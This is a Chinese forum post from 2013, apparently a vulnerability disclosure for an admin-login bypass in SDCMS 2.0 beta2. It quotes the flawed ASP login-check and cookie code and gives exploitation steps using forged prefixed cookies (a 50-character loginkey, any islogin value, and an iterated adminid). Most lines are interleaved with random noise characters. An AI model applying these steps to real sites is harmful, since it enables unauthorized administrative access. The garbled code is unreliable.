要描述:* D2 m! G. E9 e) U- k9 b
3 X3 ]4 I" s2 V6 b% I; w1 `
SDCMS后台绕过直接进入:测试版本2.0 beta2 其他版本未测试$ z8 ~; S% U% c2 i
详细说明:
$ |+ ]. A6 B% K7 ^& V. lIslogin //判断登录的方法
N( d( A+ w3 I* G1 r8 s9 r3 g
$ Y' D/ v2 B( E V5 G1 Ssub islogin()
4 y# u( q2 D! q6 h/ M ) _: x: G7 G: C$ \- {
if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then 6 H% j+ P3 C' X9 \) R
7 J, V2 O* C5 n7 d7 p
dim t0,t1,t2 . r% ?' ?. K$ w! U
# P; Z( b, {' F( nt0=sdcms.getint(sdcms.loadcookie("adminid"),0) loadcookie 8 }% H. j1 v0 a7 y
5 F- n% Q( l/ t- k7 X8 o6 \& R9 }
t1=sdcms.loadcookie("islogin")
2 |* Z: E. I0 L% X
# l8 g( m, ]7 C% G2 K: V5 s! Rt2=sdcms.loadcookie("loginkey")/ h J- b ?; i* H) o2 O+ d4 V
; b* b) x6 J8 [7 D
if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=0 or sdcms.strlen(t2)<>50 then //这里判断很坑爹 sdcms.strlen(t2)<>50 loginkey 没有任何要求 只需要输入50个即可往下执行0 @% L+ C; q" ~+ u8 _, m3 _2 I$ S
: C) [1 T- K$ i0 a" T8 a
//
3 r; K( p: [4 S" i8 I! S - y$ F/ g; { [0 d" y, \7 s4 {+ B8 X
sdcms.go "login.asp?act=out"* S6 K: i) f7 A
4 Y: O: o8 v; N) eexit sub
3 ~& i& [) ~4 ~- |) W# N2 |
# F& f/ J+ Z5 X$ |else, c, D& i. f% I3 U. s: [0 W* E
2 s3 [: q' G: O7 k! edim data
$ R% E2 j' d# v6 D9 J. W
( y# g5 }7 f" M' V! ]data=sdcms.db.dbload(1,"adminid,adminname,adminpass,islock,groupid,g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&t0&"","") //根据管理员ID查询 ID可控) q$ W8 b7 ^ @, V! }
. Y( _1 E) w, w3 I
if ubound(data)<0 then
$ \, j, z) O. {- W+ N + X* t1 O0 Z: [1 _+ ^' F
sdcms.go "login.asp?act=out"' _* k F( P* X7 _) t. q% U) ?
7 s7 I, A! K: e/ ^ P2 {* K& @
exit sub
8 s7 l( }: |& l
! H, r0 \) Y, F+ ?else
; `: L, U, [# e: Q / _! ]& n; L$ j4 |& C$ Y
if instr(data(1,0)&data(2,0),sdcms.decrypt(t1,t2))<0 or data(3,0)=0 then: `' H9 u7 o) E9 f- J5 D& ~
; r2 e4 J( Q' G8 t, U
sdcms.go "login.asp?act=out"
, m* r5 `3 ^9 [6 {
: Z k: R: I I( f3 D% {9 Y! E& n1 }exit sub
" l+ x( v1 g% ]% R& K g' N" u ' Q. B( l- p7 O+ i$ O9 k3 h# {" t
else
" J) U7 |4 Y7 v1 j* ?7 b' ~ 5 W: L5 p2 s# P C. u5 b
adminid=data(0,0)- _* f; d& n0 Y$ A/ Z2 m- e
5 e0 }" B: G. B# H
adminname=data(1,0)
# o5 s o; v* R: H' S; c/ c8 M" b ! H' G( s$ Z: D9 l- F/ ~
admin_page_lever=data(5,0)
; v9 F# r5 U0 S; B. S# C( T
6 W: J! p9 J- badmin_cate_array=data(6,0): L9 w% y& n) i! n& d
: G6 d. t" U1 F& c8 G p' ~
admin_cate_lever=data(7,0)5 y# }3 L$ ~4 o+ V* ^. h5 ~) m
8 ]! K- J+ c4 D& c
if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0; N5 j& n/ |) f2 N
/ H" B. V" ~& M7 q; Y4 l
if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
: k: [# t4 d" U7 h7 p8 E , D# H, [/ {6 c ~2 h3 ^) ~
if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0
0 I, U0 ~1 U$ ^, C
, n X% u. q) X/ q) y* a# {, c5 Tif clng(admingroupid)<>0 then: }( N% a4 i3 F0 @
# f7 S9 ?# {- z( Q# {1 h" S
admin_lever_where=" and menuid in("&admin_page_lever&")": z) i: v4 [( N' ]
" ]) \- ^7 D3 N% z* jend if, X0 [9 X' m( y- f6 {; Z
; Y! }2 D4 A$ O0 Wsdcms.setsession "adminid",adminid
5 }0 }3 q' S* [; [, E9 p, }
3 n, Y9 `$ z/ Vsdcms.setsession "adminname",adminname
& }/ \7 R. F5 Z5 P5 l$ z . I) M% f* [) M0 T5 ]! K" m2 Y
sdcms.setsession "admingroupid",data(4,0)
* }& z+ E( z; R/ k
4 @/ L5 f+ ~) J5 ]. u( pend if
+ D# S& _$ o- L' E6 K # T9 f. D5 e& o# V4 d7 I+ e
end if
. S% J7 H. G8 s" o) F4 G" B* _0 l * W" J+ Q8 q. @: I& H- \
end if: X9 x! z4 W, k; y ?
' r |- Y. |4 J
else! K% B; k) ?% I/ p) r) `
- b: r6 ? W! {* J2 ]$ u8 R, Idata=sdcms.db.dbload(1,"g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&adminid&"",""), A! D7 Z9 d$ X
7 V$ z \/ A9 S' b7 h$ |# r
if ubound(data)<0 then( k! T6 b- i* p( B: L7 |5 j. F
7 }$ _* ^2 F l G7 P
sdcms.go "login.asp?act=out"* e. P# ]0 Z: B- e* U/ Q, m
- y: Y1 W5 q- x* Y& d8 Mexit sub* B* [9 U- W8 R f6 N: W. U
$ F" F z4 w5 m# e+ a1 d9 U0 l; n" e% ?
else9 v8 t/ a3 }( Y: j7 i% }, ~
9 n) c+ |8 J( B) H
admin_page_lever=data(0,0)* i( J% H, u( O8 F3 u
& x" W+ A: l6 k: W2 n gadmin_cate_array=data(1,0)
8 E& e9 X+ A2 w4 s( Z' c* t4 H 7 Y" {3 R) S) c9 [3 g- d$ s
admin_cate_lever=data(2,0)& l- t0 A" c6 t% F" G% n
7 G- E& e* @( e" k
if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0
4 A- T0 ^# v0 |2 y8 W& J
" i2 y" [6 S/ \0 B2 a3 @if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
) r; d3 e+ A! }* m, g4 T
& [) s! J, \2 _if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0
, ~ k! E m, J* F
; s) v4 z! z0 i$ v; Tif clng(admingroupid)<>0 then/ C# ~7 w5 q' u* ^! C" T
- d+ B/ x3 f* k0 L5 g7 n: ]; I
admin_lever_where=" and menuid in("&admin_page_lever&")"
& }/ `+ O# o' p( F* T# s
: B8 Z- w4 m- F/ J- L/ ?3 B1 x4 jend if
& A, g! G4 z. I! j& T
# _8 u ?# B8 l6 a$ T. Kend if
$ Q1 [( m {7 w" j; _3 s ( n9 |; ~" s3 B, w6 A
end if4 o9 t5 {: D/ @) w+ z& K
: ^3 k- P3 P- f9 ?- cend sub
* d, ^# U, h/ r* _8 ~& Q g漏洞证明:/ ?4 j# l; |0 Y% f) E; L
看看操作COOKIE的函数
. e: r6 Z9 f4 D) B) Q( i' C " {/ z- T( | [/ B) a
public function loadcookie(t0)
, y4 D. P' E% Z( K" ]8 {2 Y( o' o 3 a) w$ w9 {7 C# e
loadcookie=request.cookies(prefix&t0)# `$ y' I+ F' R% M t8 _
, e7 x* O' X& m0 {0 W& N: E* U
end function
4 X. X2 R1 l d ~4 c ; m; V1 R$ [# c Y5 V' _( l
public sub setcookie(byval t0,byval t1)7 Z/ j, ]* O$ B/ V" F
' }4 J2 l* {/ O! O6 z) |/ ?' |response.cookies(prefix&t0)=t1
2 ^9 U# `: R" k( m
1 o! n* [5 k2 o- U% Uend sub
3 I$ @/ s( [: K2 K
$ U8 J" e; c! g! W+ z/ Wprefix/ N' S9 l# i+ m1 P% t) E _
# O0 v; x. A2 B'变量前缀,如一个空间下多次使用本程序的话,请每个程序配置不同的值
4 M" u$ b/ @$ q- [" j 0 I8 x7 H- Q. Z! i" Z4 K! U0 j
dim prefix7 z& K5 v# x: L
$ Q. L$ C$ E1 Fprefix="1Jb8Ob"
7 E: \3 \4 n% g9 _/ _
; x0 e) Y6 v" c O8 s'这个值访问一下admin/login.asp?act=out 便可得到 在COOKIE里
: j. w3 }% G( y I# u ' H0 \4 F* k, {+ W
sub out
/ j0 B& [$ X% e' T0 \, e; w
/ |6 w8 C( B. fsdcms.setsession "adminid",""6 Q; Y' N6 Z/ `% c5 O' N
: M' z& V0 p" ]" [ E, e- M Dsdcms.setsession "adminname",""# N. l8 @% B5 j( d& r/ t% @: N- b
2 a# _" Z/ F9 t
sdcms.setsession "admingroupid",""
5 T4 U3 Z/ e$ e3 z1 K: g ; m+ J: z2 f4 f2 P) ~5 k
sdcms.setcookie "adminid",""6 G( j1 t% }" t0 a
2 l& M8 Z9 o9 }/ @! csdcms.setcookie "loginkey",""
# L. w# |* t: {) M3 y& P
: d% {$ g/ E3 Ksdcms.setcookie "islogin",""4 |& R. ~8 P7 Z0 J& U! Z( z3 s
7 t, |6 B3 v7 `/ _. n5 a7 ]! W vsdcms.go "login.asp"
1 w2 i$ `( l k/ H2 Z- h . w# {; y% D; u4 S3 L; c% K
end sub+ D. Z& \$ h+ T9 V. Y3 c1 G: [
, u- ]& s* T# _ g% r7 }' w* h5 m
* [3 ] L9 z6 \( C利用方法:设置cookie prefixloginkey 50个字符 prefixislogin 随意 循环下prefixadminid 即可 默认1 然后访问后台,就可以了!
$ x1 f7 b; m5 F, u' M1 ]修复方案:2 j) P: Y$ ^1 j% a; Q+ ~
修改函数!
5 B+ ~! R% U1 p% D Y w# \2 w |
发表于 2013-7-26 12:42:43
收藏
支持
反对